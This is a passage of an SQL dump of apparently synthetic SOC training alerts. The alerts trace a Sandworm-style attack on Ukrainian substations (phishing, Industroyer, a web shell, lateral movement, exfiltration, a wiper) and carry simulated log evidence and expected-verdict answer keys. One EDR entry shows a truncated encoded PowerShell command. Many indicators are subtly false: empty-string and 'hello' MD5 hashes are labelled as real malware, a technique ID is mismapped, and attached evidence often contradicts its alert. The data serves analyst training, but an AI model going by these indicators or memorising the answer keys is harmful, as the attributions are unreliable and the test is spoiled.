transfer.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"user directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account potentially compromised.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3f9d9f8a7a8f4b9d7b9d8f9d7f9d8f7e\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash database\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with unauthorized data transfer.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.527Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:30Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231005\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"185.220.101.42\\\",\\\"filename\\\":\\\"financial_report_2023.xlsx\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hash\\\":\\\"3f9d9f8a7a8f4b9d7b9d8f9d7f9d8f7e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Data Transfer\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.527Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:30Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231005\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"185.220.101.42\\\",\\\"filename\\\":\\\"financial_report_2023.xlsx\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hash\\\":\\\"3f9d9f8a7a8f4b9d7b9d8f9d7f9d8f7e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Data Transfer\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.527Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:30Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231005\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"185.220.101.42\\\",\\\"filename\\\":\\\"financial_report_2023.xlsx\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hash\\\":\\\"3f9d9f8a7a8f4b9d7b9d8f9d7f9d8f7e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Data Transfer\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.527Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:30Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231005\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"185.220.101.42\\\",\\\"filename\\\":\\\"financial_report_2023.xlsx\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hash\\\":\\\"3f9d9f8a7a8f4b9d7b9d8f9d7f9d8f7e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Data Transfer\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.527Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:30Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231005\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"185.220.101.42\\\",\\\"filename\\\":\\\"financial_report_2023.xlsx\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hash\\\":\\\"3f9d9f8a7a8f4b9d7b9d8f9d7f9d8f7e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Data Transfer\\\",\\\"status\\\":\\\"Success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(865, 'Initial Access via Phishing Campaign', 'high', 'Email Gateway Logs', 'A spear-phishing email was sent to an employee containing a malicious attachment that, when executed, provides the attacker with initial access to the network.', 'Social Engineering', 'T1566.001', 1, 'new', NULL, '{\"email_subject\":\"Urgent: New Company Policy Update\",\"sender_email\":\"hr-updates@company.com\",\"recipient_email\":\"john.doe@victimcompany.com\",\"attachment\":{\"filename\":\"Policy_Update.docx\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"timestamp\":\"2023-10-02T14:32:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.105\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\"}', '2026-01-15 00:52:49', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"hr-updates@company.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Known phishing source\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous phishing campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Sandworm\'s known malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Phishing Campaign\",\"date\":\"2026-02-01T20:32:22.528Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(866, 'Execution of Industroyer Malware', 'critical', 'Endpoint Detection and Response (EDR) Logs', 'The adversary executed Industroyer malware on an industrial control system, posing a significant threat to the power grid\'s operations.', 'Malware Deployment', 'T1496 - Resource Hijacking', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.10.20\",\"username\":\"ics_admin\",\"process_name\":\"industroyer.exe\",\"file_hash\":\"f6c8d8e6a4c3b5d2e9c7f4a1b9e3c5d1\",\"event_description\":\"Execution of Industroyer malware detected on ICS endpoint\",\"severity\":\"high\",\"destination_host\":\"ICS-Server-01\"}', '2026-01-15 00:52:49', '2026-02-16 17:57:09', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity targeting ICS.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"ICS endpoint within the corporate network.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f6c8d8e6a4c3b5d2e9c7f4a1b9e3c5d1\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Industroyer malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"industroyer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR Logs\",\"verdict\":\"malicious\",\"details\":\"Executable linked to Industroyer malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"ics_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Authorized user account for ICS management.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(867, 'Establishing Persistence through Backdoors', 'high', 'Network Traffic Analysis', 'During the analysis of network traffic, it was identified that the threat actor attempted to maintain prolonged access to critical nodes within the grid infrastructure by deploying backdoors. This action is consistent with advanced persistence techniques aimed at ICS/SCADA systems.', 'Persistence Mechanism', 'T1505.003 - Web Shell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.0.15\",\"source_port\":443,\"destination_port\":8080,\"protocol\":\"HTTPS\",\"username\":\"admin_user\",\"filename\":\"web_shell.jsp\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"event\":\"File uploaded\",\"description\":\"Suspicious file upload detected on critical node.\"}', '2026-01-15 00:52:49', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous cyber attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Critical ICS/SCADA node within the infrastructure.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"web_shell.jsp\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File associated with web shell attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Tool\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious web shell.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(868, 'Lateral Movement to Critical Substations', 'high', 'Firewall and Network Logs', 'Leveraging their foothold, the attackers moved laterally across the network, targeting and compromising additional substations. The operation was identified through suspicious network traffic between internal systems and command and control indicators.', 'Network Propagation', 'T1570 - Lateral Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:47Z\",\"src_ip\":\"10.20.30.40\",\"dest_ip\":\"192.168.100.150\",\"dest_port\":445,\"protocol\":\"SMB\",\"action\":\"ALLOWED\",\"filename\":\"OlympicDestroyer.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"username\":\"ad_admin\",\"external_ip\":\"203.0.113.45\",\"event_type\":\"file_transfer\",\"indicator_type\":\"ICS/SCADA Targeting\",\"threat_actor\":\"Sandworm\",\"description\":\"Suspicious SMB traffic detected with potential malware transfer targeting critical substations.\"}', '2026-01-15 00:52:49', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.20.30.40\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"Compromised internal host used for lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.100.150\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"Targeted substation IP.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Sandworm APT.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"OlympicDestroyer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Identified as Olympic Destroyer malware, used in previous attacks by Sandworm.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"MD5 hash of Olympic Destroyer malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(869, 'Exfiltration of Control System Data', 'critical', 'Data Loss Prevention (DLP) Tools', 'The attackers have successfully exfiltrated sensitive ICS protocol data to their external server. This data is crucial for refining their attack strategies and ensuring future operational success.', 'Data Exfiltration', 'T1048.001 - Exfiltration Over Command and Control Channel', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"src_ip\":\"10.0.5.23\",\"dst_ip\":\"185.143.223.18\",\"protocol\":\"HTTPS\",\"action\":\"allowed\",\"username\":\"j.doe\",\"file\":\"ICS_data_extract.zip\",\"file_hash\":\"7a2b9c1f9d6f4a2bb5c3f9e3a7b8c2d1\",\"bytes_sent\":2048576,\"alert_id\":\"DLP-EXF-20231015-001\",\"description\":\"The file named ICS_data_extract.zip containing ICS protocol data was exfiltrated to an external IP address.\"}', '2026-01-15 00:52:49', '2026-02-16 17:57:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.143.223.18\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Sandworm operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"IP belongs to internal ICS network.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"ICS_data_extract.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"File name indicates potential exfiltration activity.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"7a2b9c1f9d6f4a2bb5c3f9e3a7b8c2d1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"suspicious\",\"details\":\"Hash not recognized in whitelist, matches suspicious pattern.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.533Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"src_ip\\\":\\\"10.0.5.23\\\",\\\"dst_ip\\\":\\\"185.143.223.18\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"username\\\":\\\"j.doe\\\",\\\"file\\\":\\\"ICS_data_extract.zip\\\",\\\"file_hash\\\":\\\"7a2b9c1f9d6f4a2bb5c3f9e3a7b8c2d1\\\",\\\"bytes_sent\\\":2048576,\\\"alert_id\\\":\\\"DLP-EXF-20231015-001\\\",\\\"description\\\":\\\"The file named ICS_data_extract.zip containing ICS protocol data was exfiltrated to an external IP address.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.533Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"src_ip\\\":\\\"10.0.5.23\\\",\\\"dst_ip\\\":\\\"185.143.223.18\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"username\\\":\\\"j.doe\\\",\\\"file\\\":\\\"ICS_data_extract.zip\\\",\\\"file_hash\\\":\\\"7a2b9c1f9d6f4a2bb5c3f9e3a7b8c2d1\\\",\\\"bytes_sent\\\":2048576,\\\"alert_id\\\":\\\"DLP-EXF-20231015-001\\\",\\\"description\\\":\\\"The file named ICS_data_extract.zip containing ICS protocol data was exfiltrated to an external IP address.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.533Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"src_ip\\\":\\\"10.0.5.23\\\",\\\"dst_ip\\\":\\\"185.143.223.18\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"username\\\":\\\"j.doe\\\",\\\"file\\\":\\\"ICS_data_extract.zip\\\",\\\"file_hash\\\":\\\"7a2b9c1f9d6f4a2bb5c3f9e3a7b8c2d1\\\",\\\"bytes_sent\\\":2048576,\\\"alert_id\\\":\\\"DLP-EXF-20231015-001\\\",\\\"description\\\":\\\"The file named ICS_data_extract.zip containing ICS protocol data was exfiltrated to an external IP address.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.533Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"src_ip\\\":\\\"10.0.5.23\\\",\\\"dst_ip\\\":\\\"185.143.223.18\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"username\\\":\\\"j.doe\\\",\\\"file\\\":\\\"ICS_data_extract.zip\\\",\\\"file_hash\\\":\\\"7a2b9c1f9d6f4a2bb5c3f9e3a7b8c2d1\\\",\\\"bytes_sent\\\":2048576,\\\"alert_id\\\":\\\"DLP-EXF-20231015-001\\\",\\\"description\\\":\\\"The file named ICS_data_extract.zip containing ICS protocol data was exfiltrated to an external IP address.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.533Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"src_ip\\\":\\\"10.0.5.23\\\",\\\"dst_ip\\\":\\\"185.143.223.18\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"username\\\":\\\"j.doe\\\",\\\"file\\\":\\\"ICS_data_extract.zip\\\",\\\"file_hash\\\":\\\"7a2b9c1f9d6f4a2bb5c3f9e3a7b8c2d1\\\",\\\"bytes_sent\\\":2048576,\\\"alert_id\\\":\\\"DLP-EXF-20231015-001\\\",\\\"description\\\":\\\"The file named ICS_data_extract.zip containing ICS protocol data was exfiltrated to an external IP address.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(870, 'Coordinated Grid Disruption', 'critical', 'ICS Monitoring Systems', 'Culminating their efforts, Sandworm executes a synchronized attack on multiple substations, resulting in significant power outages across Ukraine. Advanced techniques were employed, leveraging ICS/SCADA targeting and wiper malware to cause destruction.', 'Destructive Attack', 'T1485 - Data Destruction', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T02:45:37Z\",\"event_id\":\"4625\",\"source_ip\":\"185.14.89.32\",\"destination_ip\":\"192.168.10.45\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"malware_filename\":\"wiper_destruction.exe\",\"username\":\"admin_ukraine\",\"event_description\":\"Unauthorized execution of wiper malware on ICS systems detected\",\"network_protocol\":\"TCP\",\"destination_port\":445,\"action_taken\":\"Execution blocked\",\"status\":\"failed\"}', '2026-01-15 00:52:49', '2026-02-16 17:57:26', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.14.89.32\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with Sandworm operations in previous attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"IP of targeted ICS substation\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Sandworm wiper malware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"wiper_destruction.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"Filename associated with wiper malware used in attacks\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_ukraine\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.535Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:45:37Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"185.14.89.32\\\",\\\"destination_ip\\\":\\\"192.168.10.45\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"malware_filename\\\":\\\"wiper_destruction.exe\\\",\\\"username\\\":\\\"admin_ukraine\\\",\\\"event_description\\\":\\\"Unauthorized execution of wiper malware on ICS systems detected\\\",\\\"network_protocol\\\":\\\"TCP\\\",\\\"destination_port\\\":445,\\\"action_taken\\\":\\\"Execution blocked\\\",\\\"status\\\":\\\"failed\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.535Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:45:37Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"185.14.89.32\\\",\\\"destination_ip\\\":\\\"192.168.10.45\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"malware_filename\\\":\\\"wiper_destruction.exe\\\",\\\"username\\\":\\\"admin_ukraine\\\",\\\"event_description\\\":\\\"Unauthorized execution of wiper malware on ICS systems detected\\\",\\\"network_protocol\\\":\\\"TCP\\\",\\\"destination_port\\\":445,\\\"action_taken\\\":\\\"Execution blocked\\\",\\\"status\\\":\\\"failed\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.535Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:45:37Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"185.14.89.32\\\",\\\"destination_ip\\\":\\\"192.168.10.45\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"malware_filename\\\":\\\"wiper_destruction.exe\\\",\\\"username\\\":\\\"admin_ukraine\\\",\\\"event_description\\\":\\\"Unauthorized execution of wiper malware on ICS systems detected\\\",\\\"network_protocol\\\":\\\"TCP\\\",\\\"destination_port\\\":445,\\\"action_taken\\\":\\\"Execution blocked\\\",\\\"status\\\":\\\"failed\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.535Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:45:37Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"185.14.89.32\\\",\\\"destination_ip\\\":\\\"192.168.10.45\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"malware_filename\\\":\\\"wiper_destruction.exe\\\",\\\"username\\\":\\\"admin_ukraine\\\",\\\"event_description\\\":\\\"Unauthorized execution of wiper malware on ICS systems detected\\\",\\\"network_protocol\\\":\\\"TCP\\\",\\\"destination_port\\\":445,\\\"action_taken\\\":\\\"Execution blocked\\\",\\\"status\\\":\\\"failed\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.535Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 